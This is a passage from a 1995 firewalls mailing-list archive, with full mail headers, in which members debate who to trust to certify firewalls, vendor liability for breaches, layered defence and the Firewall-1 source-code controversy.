<1014*/G=Peter/S=BEAN/O=ldn.01/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/@MHS> Importance: normal In-Reply-To: <199509081803.LAA26470*/DD.RFC-822=miles.greatcircle.com/PRMD=gc+internet/ADMD=GOVMT.CANADA/C=CA/@MHS> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am away from the office until Monday, 18 September 1995 From firewalls-owner Fri Sep 8 13:31:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA02777 for firewalls-outgoing; Fri, 8 Sep 1995 13:25:22 -0700 Received: from svcs1.digex.net (svcs1.digex.net [204.91.197.224]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA02769 for ; Fri, 8 Sep 1995 13:25:18 -0700 Received: from paragon-systems.com (sundevil.paragon-systems.com [199.125.207.2]) by svcs1.digex.net (8.6.12/8.6.12) with SMTP id QAA10176; Fri, 8 Sep 1995 16:23:42 -0400 Received: from sandfiddler.paragon-systems.com by paragon-systems.com (4.1/SMI-4.1) id AA02230; Fri, 8 Sep 95 16:26:37 EDT Received: by sandfiddler.paragon-systems.com (5.x/SMI-SVR4) id AA00612; Fri, 8 Sep 1995 16:19:04 -0400 Date: Fri, 8 Sep 1995 16:19:04 -0400 From: rmck@sandfiddler.paragon-systems.com (Bob McKisson) Message-Id: <9509082019.AA00612@sandfiddler.paragon-systems.com> To: ormat1@zeus.datasrv.co.il Subject: Re: Firewall-1 concerns Cc: firewalls@GreatCircle.COM X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > It's nice to see you found meaning in the letters of the word Mosad, but > it's not even an english word (and defenatly not spelled with capital > letters). The word is in hebrew and means 'firm' or 'agency'. > > I know this is off topic, but i just couldn't help myself. Well, I was only half joking. Regardless, indeed you are absolutely right. An old Israeli friend of mine at the Pentagon just called to thank me for the publicity. His translation was somewhat different but you two are close enough. and enough said. rmck From firewalls-owner Fri Sep 8 13:32:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA02140 for firewalls-outgoing; Fri, 8 Sep 1995 13:10:32 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA02129 for ; Fri, 8 Sep 1995 13:10:18 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA11038; Fri, 8 Sep 95 15:38:22 -0400 Date: Fri, 8 Sep 95 15:38:22 -0400 Message-Id: <9509081938.AA11038@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: On trusting trust Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> (3) being in the USA I would trust a review by the NSA and a very few others. >The "40 bit keys are all anyone needs" NSA? What's their incentive to >encourage good firewalls? The Clipper Chip people? Ok, you want the long form ? I would trust the NSA to follow their charter as currently directed by the political appointee that runs the place. One size need not fit all. Please notice that I said "I would trust..." did not say that any one else should, YOU have to make the decision who YOU are going to trust. Besides, not everyone on this list is in the USofA so some would probably be better served by asking the Mossad for advice. You have your phone numbers, I have mine. However, if I had a candidate FireWall and the NSA/NCSC had looked at it and when I asked they said something like "we know of no reason to exclude it from consideration" (don't expect to get an unclassified declaritive sentence from a NSA rep on duty beyond "it's a nice day"), it would probably stay in contention (same goes for engineers 8*). >OK folks, imagine there was to be a firewall certification authority. Who >would you want them to be? Who do you trust? I suspect that there is no one good answer to that since the question really is "who do you trust to put your interests at least as high as their own". For some lurkers, the answer might be "Emmanuel Goldstein", others "Arthur Anderson", "Kroll Associates", or "my mother" - and *in their context* each would be correct. Of course, if you add "who is *competant* to certify a firewall, then the list gets a whole lot shorter. Add "purely objectively" and we are down to zero (a shame but true). Magazines try to be objective but typically lack technical expertise and those tecchies on call are rarely unbiased. So it comes down to "of those who are competant and whose biases will probably coincide with those of my employer in this matter" and I said "the NSA is one". Warmly, Padgett ps "the buck stops here" From firewalls-owner Fri Sep 8 14:08:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA03492 for firewalls-outgoing; Fri, 8 Sep 1995 13:36:47 -0700 Received: from lists (alfalfa.sips.state.nc.us [149.168.11.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA03485 for ; Fri, 8 Sep 1995 13:36:43 -0700 Received: from everett.pitt.cc.nc.us by lists (5.0/SMI-SVR4) id AA07143; Fri, 8 Sep 1995 16:30:37 +0500 Received: from EVERETT/SpoolDir by everett.pitt.cc.nc.us (Mercury 1.21); 8 Sep 95 16:40:37 EST5EDT Received: from SpoolDir by EVERETT (Mercury 1.21); 8 Sep 95 16:40:08 EST5EDT From: "Jim Leo" Organization: Pitt Community College To: firewalls@GreatCircle.com Date: Fri, 8 Sep 1995 16:39:59 EST5EDT Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Request for Information Reply-To: admin@everett.pitt.cc.nc.us Priority: urgent X-Mailer: Pegasus Mail for Windows (v2.01) Message-Id: content-length: 960 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Gee, The last time I posted to this list, I got flamed but good... Now it seems that other people have the same concerns as I do about commercial firewall products. Nuff' said 'bout that... I need some help from the folks on the list. I have been 'tasked' with evaluating three (3) methods of security implementation and then writing an evaluation/report. The three are : 1. Proxy Servers 2. Packet Filtering 3. Fireswalls Don't ask me about #3. Suffice it to say 'they' are not exactly literate on topics such as these. I currently have the 'recommended' literature. However, now I have to setup my 'test bed' and then bludgeon it. What I need are recommendations from the list. I also need to know where to get a set of good 'bludgeons'.... Please respond directly. NOT to the list. All confidentiallity will be preserved.. They also want me to do a survey....... More Later... Over the barrel again Jim Leo voice (919) 321-4346 From firewalls-owner Fri Sep 8 14:15:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA03981 for firewalls-outgoing; Fri, 8 Sep 1995 13:44:25 -0700 Received: from uucp-1.csn.net (uucp-1.csn.net [199.117.27.26]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA03967 for ; Fri, 8 Sep 1995 13:44:20 -0700 Received: from bacchus.UUCP (uucp@localhost) by uucp-1.csn.net (8.6.12/8.6.12) with UUCP id NAA00287 for greatcircle.com!Firewalls; Fri, 8 Sep 1995 13:32:43 -0600 From: Shawn Steele Message-Id: <9509081324.ZM24627@aob.org> Date: Fri, 8 Sep 1995 13:24:53 -0600 In-Reply-To: firewalls-digest-owner@greatcircle.com "Firewalls-Digest V4 #518" (Sep 8, 11:03am) References: <199509081803.LAA26470@miles.greatcircle.com> X-Mailer: Z-Mail Lite (3.2.0 26may94) To: Firewalls@greatcircle.com Subject: upgrade to commercial firewalls Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Interesting comment though from him, which in my naivete I'd not > thought about. If we get attacked and lose software/data etc, then > who's liable ? > If we use freeware products, then noone is. If we use a commercial > product, then we can, I guess, sue the firewall supplier ... ? Ah, sue-happy america. I seriously doubt you'll find a supplier that doesn't have some sort of clause specifically disallowing any damages from using their product. (A friend recently had his house broken into, I doubt he could successfully sue the deadbolt manufacturer). It does give the someone an "it's not my fault" escape though, even if they misconfigured something, especially if managment doesn't know much about computer security. - shawn Shawn Steele Information Systems Administrator Association of Brewers (303) 447-0816 x 118 (voice) 736 Pearl Street (303) 447-2825 (fax) PO Box 1679 shawn@aob.org (e-mail) Boulder, CO 80306-1679 info@aob.org (aob info) U.S.A. http://www.aob.org/aob (web) Note: When replying to my messages, please include enough of my message so that I know what you're replying to! :-) From firewalls-owner Fri Sep 8 14:30:30 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA05909 for firewalls-outgoing; Fri, 8 Sep 1995 14:22:29 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA05894 for ; Fri, 8 Sep 1995 14:22:23 -0700 From: Brad.Powell@eng.sun.com Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA11400; Fri, 8 Sep 95 17:19:22 -0400 Date: Fri, 8 Sep 95 17:19:22 -0400 Message-Id: <9509082119.AA11400@uvs1.orl.mmc.com> To: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com, padgett@tccslr.dnet.mmc.com, dmurphy@coltrane.cwa.com Subject: Re: Corporate Audits Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From firewalls-owner@GreatCircle.COM Fri Sep 8 13:01:46 1995 >Subject: Corporate Audits Dan writes: >----------------------------------------------------------------------+ >| Dan Murphy | CWA Comm Products | 401 Alberto Wy, Los Gatos, CA 95032 | >| Vox: (408) 358-1529 | Fax: (408) 356-7061 | Email: dmurphy@cwa.com | >+----------------------------------------------------------------------+ >So, have any of you big-business wage-slaves had corporate auditors come >into your shop and ask questions (perceptive or otherwise) about >firewalls and network security yet, and if so, would you be willing/able >to share such stories with the list? Better yet, does anybody work for >one of the Used-To-Be-Big-7 accounting firms and know what they're doing >internally about this? > I'll tell you one thing they better not be doing and thats trusting all their defences to *just* the firewall. Some of the ones I've talked with (that happened to -pass- their audit) have gone to an internal approach of also securing the desktops and enhancing the internal network. The four "A"'s Authentication Authorization Accountability Access control The firewall should be your best/strongest defence but it should *never* be your _only_ defence ======================================================================= Brad Powell : brad.powell@Sun.COM Sr. Network Security Consultant SunNetworks, Sun Microsystems Inc. ======================================================================= The views expressed are those of the author and may not reflect the views of Sun Microsystems Inc. ======================================================================= From firewalls-owner Fri Sep 8 15:00:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA06852 for firewalls-outgoing; Fri, 8 Sep 1995 14:46:33 -0700 Received: from chum.hooked.net (chum.hooked.net [199.2.134.20]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA06845 for ; Fri, 8 Sep 1995 14:46:30 -0700 Received: (from ee@localhost) by chum.hooked.net (8.6.12/8.6.12) id OAA02362; Fri, 8 Sep 1995 14:45:06 -0700 Date: Fri, 8 Sep 1995 14:45:06 -0700 From: Eric Eigenfeld Message-Id: <199509082145.OAA02362@chum.hooked.net> To: firewalls@GreatCircle.COM Subject: mirrored fw Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings, I am developing plans for a mirrored fw architecture. The client requires 2--->n locations, each with its own independently operating ,complete architectures that could assume control on demand. User base is quite large, and firewalls are already implemented and functioning in multiple locations. Throw in automatic mirroring of changes to internal and external web servers, a left handed monkey wrench for adjustments, and they're happy. Any experiences with mirrored firewalls? Thanks in advance, Eric Eigenfeld Director, Client Services National Data Management From firewalls-owner Fri Sep 8 15:02:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA06345 for firewalls-outgoing; Fri, 8 Sep 1995 14:33:23 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA06275 for ; Fri, 8 Sep 1995 14:32:05 -0700 From: Brad.Powell@eng.sun.com Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA11429; Fri, 8 Sep 95 17:30:21 -0400 Date: Fri, 8 Sep 95 17:30:20 -0400 Message-Id: <9509082130.AA11429@uvs1.orl.mmc.com> To: padgett@tccslr.dnet.mmc.com, ris1!nmti.com!peter@uuneo.neosoft.com Cc: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com Subject: Re: On Trusting Trust Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From firewalls-owner@GreatCircle.COM Fri Sep 8 13:18:06 1995 >From: ris1!nmti.com!peter@uuneo.neosoft.com >Date: Fri, 8 Sep 95 15:27:19 -0400 > >OK folks, imagine there was to be a firewall certification authority. Who >would you want them to be? Who do you trust? > I thought we already went through this last month :-( "Trust but verify independantly" is the common auditors approach. "Trust no one" is the common thinking on firewalls. Please don't get me wrong, its not that reputable firewall vendors and code writers are not striving for 100% safe. Its just that anyone can make a mistake (I'm probably making one right now by getting sucked into this) So how do you sleep at night? Well imho you sleep by first learning to live with a little risk and second by giving yourself more than one layer of protection. The "onion" approach to security. :-) Multiple layers, and not all the layers being equal or from the same vendor will give you a better chance at detecting intrusions, and a better change at stopping the intrusion before it costs you/your-company significant cost. Place your more sensative data ($$$) closer to the center of the onion and the "more public" (less $$$) closer towards the outside of the onion and you will start getting warm-n-fuzzy and be able to sleep better. The reason I use the onion model is because like an onion the more layers you make users peel away to get to the data they need the more they are going to cry about it :-). ======================================================================= Brad Powell : brad.powell@Sun.COM Sr. Network Security Consultant SunNetworks, Sun Microsystems Inc. ======================================================================= The views expressed are those of the author and may not reflect the views of Sun Microsystems Inc. ======================================================================= From firewalls-owner Fri Sep 8 15:30:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA07590 for firewalls-outgoing; Fri, 8 Sep 1995 15:23:04 -0700 Received: from nutpagw.nutec.tche.br ([200.17.171.89]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA07582 for ; Fri, 8 Sep 1995 15:22:49 -0700 From: silveira@nutecpa.nutec.tche.br Received: (from root@localhost) by nutpagw.nutec.tche.br (8.6.9/8.6.9) id UAA18328 for ; Fri, 8 Sep 1995 20:10:45 -0300 Received: from unknown(200.17.174.65) by nutpagw.nutec.tche.br via smap (V1.3) id sma018323; Fri Sep 8 20:10:29 1995 Received: from canario by nutecpa.nutec.tche.br id aa11625; 8 Sep 95 19:22 BRA Received: from dodo by canario.canario.nutecsp.br id aa27730; 8 Sep 95 18:44 BST MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit Date: Fri, 08 Sep 95 18:46:08 -0300 Subject: Re: Firewall-1 concerns To: firewalls@greatcircle.com In-Reply-To: <199509072140.XAA16451@utopia.hacktic.nl> X-Mailer: SPRY Mail Version: 04.00.06.14 Message-ID: <9509081844.aa27730@canario.canario.nutecsp.br> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 7 Sep 1995, nobody@replay.com (Anonymous) wrote: >I recently found out that the Firewall-1 product from Sun is actually >written and developed by a company in Israel and that Sun does not have >nor has access to the source code. [snip, snip, snip] >It turns out that Sun does not have the source and hasn't inspected it. > hope that the US military and other sensitive agencies or companies >with sensitive information aren't using this product for protection. > Ignoring the fact that this poster didnt put his/her e-mail (which I think is not proper in a public forum), he/she may have raised a few interesting topics: - If it is true that Sun hasnt access to source (anybody from Sun with an official statement please jump in), how can it offer this solution to US customers, including the government? - Lets assume that a new attack is discovered and that FW-1 customers, without access to source, are compromised. Who can they hold liable for the damages, if anybody? Finally, on a broader issue, a question from me: How are contracts signed between the firewall provider and the customer with regard to the possibility of a successful attack? TIA, Fernando -- Fernando da Silveira Montenegro E-mail: silveira@nutec.com Nutec Informatica S.A. Phone.: +55-11-505-5728 Rua Florida, 1821/4th floor Fax...: +55-11-505-1918 Sao Paulo, SP BRAZIL 04565-001 From firewalls-owner Fri Sep 8 18:00:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA11634 for firewalls-outgoing; Fri, 8 Sep 1995 17:55:25 -0700 Received: from junix.ju.edu (junix.ju.edu [204.29.160.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA11626 for ; Fri, 8 Sep 1995 17:55:22 -0700 Received: by junix.ju.edu (5.61/1.39) id AA16921; Fri, 8 Sep 95 20:52:02 -0400 From: ddill@junix.ju.edu (Daniel Dill) Message-Id: <9509090052.AA16921@junix.ju.edu> Subject: Re: upgrade to commercial firewalls To: dannyc@gmap.leeds.ac.uk (Danny Cox) Date: Fri, 8 Sep 1995 20:52:02 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <5290.9509081145@gmap.leeds.ac.uk> from "Danny Cox" at Sep 8, 95 12:45:48 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1021 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Interesting comment though from him, which in my naivete I'd not thought > about. If we get attacked and lose software/data etc, then who's liable ? > If we use freeware products, then noone is. If we use a commercial product, > then we can, I guess, sue the firewall supplier ... ? At least that was > his comment, and I'd be very interested to hear what you all think to this > concept. This is based on the idea that they'd be covered by their indemnity > insurance ... > > Thanks all, I appreciate your time, > Danny > This is NOT personal, but... What about personal responsibility? Everyone else pays because a few companies are not willing to spend the time, effort, money to develop the necessary expertise. Regards, Daniel -- Daniel L. Dill Ultimately, the strongest argument for the people to retain the right to keep and bear ddill@junix.ju.edu arms, is to protect themselves against tyranny in government. --Thomas Jefferson From firewalls-owner Fri Sep 8 18:02:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA11459 for firewalls-outgoing; Fri, 8 Sep 1995 17:44:42 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA11452 for ; Fri, 8 Sep 1995 17:44:38 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA11877; Fri, 8 Sep 95 20:34:15 -0400 Date: Fri, 8 Sep 95 20:34:15 -0400 Message-Id: <9509090034.AA11877@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: RFI Sender: firewalls-owner@GreatCircle.COM Precedence: bulk a) if you want a direct response, include your address in the body, not all of our mail readers provide the original header (I can't even do a reply - it would go to "firewalls-owner" so must FORW & retype the Subject:) b: Jim rites: >writing an evaluation/report. The three are : > 1. Proxy Servers > 2. Packet Filtering > 3. Fireswalls Is really 1) Packet Filter 2) Proxy Server 3) Application Filter and many today are really *all of the above". A firewall is "a collection of devices that enforce a security policy". and as such is certainly "all of the above" plus encryption/decryption, strong authentication, reconfiguration on exception, and alarming (quite). >Don't ask me about #3. Suffice it to say 'they' are not exactly >literate on topics such as these. So take the chance to educate - don't beat them over the head with it, just do it right. >They also want me to do a survey....... Of what ? Nodes ? Users ? Ferret & Iguana population ? Warmly, Padgett From firewalls-owner Fri Sep 8 18:30:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA12256 for firewalls-outgoing; Fri, 8 Sep 1995 18:22:01 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA12247 for ; Fri, 8 Sep 1995 18:21:57 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id UAA29151 for greatcircle.com!firewalls; Fri, 8 Sep 1995 20:12:04 -0500 Received: by ris1.nmti.com (smail2.5) id AA14409; 8 Sep 95 17:53:54 CDT (Fri) Received: by sonic.nmti.com; id AA14631; Fri, 8 Sep 1995 18:20:29 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9509082320.AA14631@sonic.nmti.com.nmti.com> Subject: Re: On trusting trust To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) Date: Fri, 8 Sep 1995 18:20:28 -0500 (CDT) Cc: firewalls@greatcircle.com In-Reply-To: <9509081938.AA11038@uvs1.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at Sep 8, 95 03:38:22 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 611 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Ok, you want the long form ? I would trust the NSA to follow their charter > as currently directed by the political appointee that runs the place. But the question was "who would you trust to check out a firewall". Past experience is that NSA doesn't really care about Security if it's not National. If your employer isn't the government, or if the firewall isn't protecting something the NSA thinks needs to be secret, I don't see any reason for them to care. If your employer is someone the NSA wants to keep tabs on (like, just about any large firm that works for the government) then all bets are off. From firewalls-owner Fri Sep 8 19:30:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA13499 for firewalls-outgoing; Fri, 8 Sep 1995 19:23:55 -0700 Received: from panix2.panix.com (panix2.panix.com [198.7.0.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA13486; Fri, 8 Sep 1995 19:23:50 -0700 Received: (from lawnyc@localhost) by panix2.panix.com (8.6.12/8.6.12+PanixU1.1) id WAA19897; Fri, 8 Sep 1995 22:22:24 -0400 Date: Fri, 8 Sep 1995 22:22:21 -0400 (EDT) From: "John A. Young" To: Firewalls@GreatCircle.COM cc: firewalls-digest@GreatCircle.COM Subject: Re: Firewalls-Digest V4 #518 In-Reply-To: <199509081803.LAA26470@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 8 Sep 1995 the firewalls-digest included: > From: Danny Cox > Date: Fri, 8 Sep 1995 12:45:48 +0100 > Subject: upgrade to commercial firewalls > > Management here seems to have a healthy attitude to security - bordering on > the paranoid if anything, but willing to spend the money, which is good. > > Just talking now with one of the senior managers .. our current situation is > that I've built a firewall router using SOCKS .. my next step may have been > to upgrade using the TIS fwtk stuff .. > > Interesting comment though from him, which in my naivete I'd not thought > about. If we get attacked and lose software/data etc, then who's liable ? > If we use freeware products, then noone is. If we use a commercial product, > then we can, I guess, sue the firewall supplier ... ? At least that was > his comment, and I'd be very interested to hear what you all think to this > concept. This is based on the idea that they'd be covered by their indemnity > insurance ... > > ------------------------------ > > From: Steve Marquess > Date: Fri, 8 Sep 1995 10:07:32 -0400 > Subject: Re: upgrade to commercial firewalls > > > > This exact same point has been raised repeatedly at my company, a large > financial > services firm with a "healthy bordering on paranoid" concern about security. > The ability to assign blame in the event of problems is a very significant > consideration in the acquisition of important systems and services. And if > you think about it from the management point of view there is a certain > logic to it: if we suffer a business loss due to the failure of "home grown" > or "roll your own" (terms of disparagement here...) software then the blame > must fall on those permitting/approving/performing that software development. > > If a commercially acquired and configured product failed then it's just "well, > vendor X let us down again". A fairly common and believable situation here. > The possibility of actually collecting financial damages seems to be less > important than the exculpatory assignment of responsibility. I don't think > anyone really thinks we could pry money out of a major vendor because of > software > defects, especially not for incidental damages. > > Keep in mind also that any significant decisions about deploying a firewall > will be made by upper management, all business types far removed from any > close appreciation of the technical nuances. With all the confusing and > conflicting advice and information they get from vendors, trade rags, and > in-house staff they really don't what to believe. Those of us in the > boiler room > are close to the issues and have definite opinions, but we are only a small > piece of the real decision process. > > The bigger and better known the vendor the more powerful the attraction of > this argument. Hence a strong predisposition to well known and well marketed > products, with cost and product quality often very secondary considerations. > > > ------------------------------ > > From: Brian Murrell > Date: Fri, 8 Sep 1995 08:32:15 -0700 > Subject: Re: upgrade to commercial firewalls > > > > Interesting comment though from him, which in my naivete I'd not thought > > about. If we get attacked and lose software/data etc, then who's liable ? > > Oh goody. I'd love to see this one hashed out, although I think it'll be > relevant to firewalls for a day or two tops. :-) > > > If we use freeware products, then noone is. If we use a commercial product, > > then we can, I guess, sue the firewall supplier ... ? At least that was > > his comment, and I'd be very interested to hear what you all think to this > > concept. This is based on the idea that they'd be covered by their > > indemnity insurance ... > > Good luck. > > b. > > > ------------------------------ > > From: Ted Doty > Date: Fri, 8 Sep 1995 10:27:56 -0400 > Subject: Re: upgrade to commercial firewalls > > Steve Marquess writes: > > >From: Danny Cox > > > > > > > > > > This exact same point has been raised repeatedly at my company, a large > > financial > > services firm with a "healthy bordering on paranoid" concern about security. > > The ability to assign blame in the event of problems is a very significant > > consideration in the acquisition of important systems and services. And if > > [snip] > > So long as people keep thinking that a magic box will solve all their > present and future security worries, assigning blame is a somewhat humorous > exercise in futility. Also, as long as 80% (or whatever the current number > is ... send your flames to /dev/null) of all "break-ins" are internal, and > as long as only 5% (same comment as above) of all corporate security > policies are detailed enough to actually implement something from, you > probably are barking up the wrong tree. > > Most of the security consultants will tell you that a firewall will help, > but your security is ultimately your own responsibility. Get a policy, > implement it, track it, tell your users what it is, keep your eye on > bugtraq, (...) and you'll be in pretty good shape. This doesn't mean that > you won't get hacked, or that you won't lose data (you mean that disaster > recovery isn't in your policy either?). > > Without the above, liability is probably hard to demonstrate. > - -- > > - - Ted Though this discussion sorely tempts me simply to post "Have gun, will travel", I must agree --as a lawyer-- with Steve, Brian and Ted that the only solace Danny's management can realistically find in the vendor's potential liability is that there will be an identifiable scapegoat to which everyone can point. Steve reminds me of those ancient days when Compaq was struggling to make it as a fledgling vendor of "clones" and the word generally going around was that "nobody ever got fired for buying IBM". If, as I've so often read here, "security by obscurity" is foolish, then I would add that "security by obscurity + litigation" is downright insane. Even if one is able to surmount the many obstacles to victory, including those described by Ted, it is virtually impossible to be made "whole". There will be elements of damage which even the most generous judge or jury will not adequately recompense, not to mention the astronomical expenses which we hired guns are wont to run up (over and above our almost invariably modest fees ). Also, a major litigation, in and of itself, tends to consume enormous chunks of management's time and energy which otherwise could have been put to much more productive use. In short, if, *despite* the best laid plans ..., the sky falls in, then litigation might sensibly be considered as a possible element of damage control. But, to base one's plans and choices on the availability of litigation is, IMNSHO, to court disaster. The place where a good lawyer can best help vis-a-vis a vendor is right at the start, when the purchase contract is being discussed. Even then, the lawyer's primary value can come from helping you be sure you have properly articulated your needs and that you get what is needed (e.g., access to source code) to satisfy yourself that they are being met -- and not from artfully drafting clauses to pin liability on the vendor if anything goes wrong. [soapbox mode: off] Regards, John . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * Providing user-friendly assistance : LawNYC@panix.com to techies and others, from NYC and : John A. Young, J.D. (Yale 1964) around the world, in dealing with : P.O. Box 4695 the problems, opportunities and : New York, NY 10185-4695 plain conundrums encountered when : Telephone (voice & fax) interfacing with the arcane worlds : (212) 765-2170 of business, law and property. * : (718) 875-0337 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzA2deMAAAEEANg3rhWjDOg6CUJ01zp6VaPc+Vebzh2cYuLrJCwXOwJS+mmF vhFuxHwe+sJrDxmEFMI5lsvQbSC9E5L7dUBqVvp4f5MeysnZ6u9h/Vc2TwbS8QSn hQmqBEaWcunsIN8RU2xTMT5B5Frr+uMhWL681e2L0mx11uc157fUcvRcULXFAAUR tCZKb2huIEEuIFlvdW5nLCBKLkQuIDxMYXdOWUNAcGFuaXguY29tPg== =7QlE -----END PGP PUBLIC KEY BLOCK----- From firewalls-owner Fri Sep 8 20:37:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA15177 for firewalls-outgoing; Fri, 8 Sep 1995 20:24:57 -0700 Received: from gatepas.gc.ca (gatepas.gc.ca [192.197.79.133]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA15170 for ; Fri, 8 Sep 1995 20:24:54 -0700 Reply-To: Peter.BEAN@ldn01.x400.gc.ca Date: Sat, 09 Sep 1995 03:20:01 +0000 Priority: normal Content-Identifier: OLIVETTI-MAIL3.0 X400-Content-Type: P2-1984 X400-MTS-Identifier: [/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/;1032:950909032001] From: Peter.BEAN@ldn01.x400.gc.ca (BEAN Peter -LDN -AG -LES) To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V4 #519 Message-Id: <1032*/G=Peter/S=BEAN/O=ldn.01/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/@MHS> Importance: normal In-Reply-To: <199509090231.TAA13602*/DD.RFC-822=miles.greatcircle.com/PRMD=gc+internet/ADMD=GOVMT.CANADA/C=CA/@MHS> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am away from the office until Monday, 18 September 1995 From firewalls-owner Fri Sep 8 21:30:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA16157 for firewalls-outgoing; Fri, 8 Sep 1995 21:13:00 -0700 Received: from switchblade.iwi.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA16148 for ; Fri, 8 Sep 1995 21:12:55 -0700 Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id AAA15521; Sat, 9 Sep 1995 00:32:57 -0400 From: "Marcus J. Ranum" Message-Id: <199509090432.AAA15521@switchblade.iwi.com> Subject: firewall certification authority To: firewalls@greatcircle.com Date: Sat, 9 Sep 1995 00:32:57 -0400 (EDT) Cc: rpower@mfi.com Reply-To: mjr@iwi.com Organization: Information Warehouse! Inc, Baltimore, MD URL: mjr's web page Phone: 410-889-8569 Coredump: Infocalypse Now!!! X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 6060 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >OK folks, imagine there was to be a firewall certification authority. Who >would you want them to be? Who do you trust? First ask if there should be one at all. Not all firewalls are the same; many have very different design goals and objectives. For a single authority to certify a firewall will imply a single authority imposing its idea of "correct design": a role NSA has adopted in the past with varying levels of success and questionable benefits to the community. This is a topic I've been wrestling with for a while. Implicit in the issue of 